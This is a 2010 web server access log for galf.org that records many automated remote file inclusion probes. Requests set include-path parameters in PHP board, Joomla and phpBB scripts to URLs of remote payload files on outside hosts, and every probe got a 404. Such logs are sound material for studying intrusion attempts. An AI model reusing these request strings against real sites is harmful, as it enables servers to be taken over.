125.141.91.138 - - [07/Feb/2010:20:12:09 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:09 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:09 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:15 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:15 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:15 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:16 -0800] "GET /logs/access_100201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [07/Feb/2010:20:12:30 -0800] "GET /logs/access_100201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:14:59 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:14:59 -0800] "GET /logs//delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:14:59 -0800] "GET /delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:15:11 -0800] "GET /logs/access_100201.log%20%20//delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:20:16:22 -0800] "GET /bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:20:16:22 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:20:16:22 -0800] "GET /logs/access_100201.log%20%20//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:20:17:43 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:20:17:43 -0800] "GET /logs//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:20:17:43 -0800] "GET /logs/access_100201.log//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:20:17:58 -0800] "GET /write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:20:17:58 -0800] "GET /logs/access_100201.log//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:20:17:58 -0800] "GET /logs//write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:20:55 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:20:55 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:20:55 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:20:59 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:20:59 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:00 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:11 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:11 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:11 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:22 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:22 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:21:22 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:15 -0800] "GET /logs/access_090907.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:32 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:33 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:33 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:38 -0800] "GET /logs/access_090907.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:46 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:46 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:23:47 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:24:52 -0800] "GET /logs/access_090817.log////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:24:52 -0800] "GET /logs/access_091019.log////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:24:52 -0800] "GET ///delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:24:52 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:25:02 -0800] "GET ///delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:25:02 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:25:02 -0800] "GET /logs/access_091019.log////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:25:02 -0800] "GET /logs/access_090817.log////delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.34 - - [07/Feb/2010:20:26:38 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; BIGPOND_ADSL_42)" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:29:20 -0800] "GET /delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:29:20 -0800] "GET /logs/access.log//delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:29:20 -0800] "GET /logs/access_100201.log//delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [07/Feb/2010:20:29:20 -0800] "GET /logs//delete.php?board_skin_path=http://dennybrown.name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:30:31 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:30:36 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:30:36 -0800] "GET /logs/access.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:20:30:50 -0800] "GET /logs/access_100201.log//bbs//write_update.php?board_skin_path=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:31:14 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:31:14 -0800] "GET /logs/access_091207.log%20%20//include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:31:14 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:32:55 -0800] "GET /logs/access_100201.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:32:59 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:32:59 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:32:59 -0800] "GET /logs/access_091207.log%20%20//include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:32:59 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:33:39 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:33:44 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:33:44 -0800] "GET /logs/access.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:34:22 -0800] "GET /write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:34:22 -0800] "GET /logs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:34:22 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:24 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:24 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:25 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:29 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:29 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:30 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:30 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:34:30 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:34:32 -0800] "GET /logs/access_100201.log%20%20/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:34:39 -0800] "GET //bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [07/Feb/2010:20:34:40 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:34:47 -0800] "GET /logs///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:34:47 -0800] "GET /logs/access.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:34:53 -0800] "GET /logs/access_100201.log%20%20//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:34:54 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:34:55 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:35:22 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:35:22 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:35:22 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:35:28 -0800] "GET /logs/access_100201.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:20:35:33 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:20:36:53 -0800] "GET /logs/access_100201.log%20%20///bbs//write.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.51.69 - - [07/Feb/2010:20:37:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:37:38 -0800] "GET /logs/access_091026.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:37:38 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:37:38 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:38:52 -0800] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:38:52 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:38:52 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:20:39:00 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:39:00 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.149.110.210 - - [07/Feb/2010:20:39:09 -0800] "GET /logs/access_100201.log/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:39:46 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:39:46 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:39:46 -0800] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.51.69 - - [07/Feb/2010:20:41:23 -0800] "GET /cendoc.php HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:20:46:20 -0800] "GET /skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:20:46:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:20:46:20 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:46:36 -0800] "GET /logs/access_091123.log//setup.php?dir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:46:36 -0800] "GET /setup.php?dir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:46:36 -0800] "GET /logs//setup.php?dir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:46:43 -0800] "GET /logs/access_091026.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:48:37 -0800] "GET /logs/access_091123.log//setup.php?dir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:48:37 -0800] "GET /logs//setup.php?dir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:20:48:37 -0800] "GET /setup.php?dir=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:48:50 -0800] "GET /logs/access_090720.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
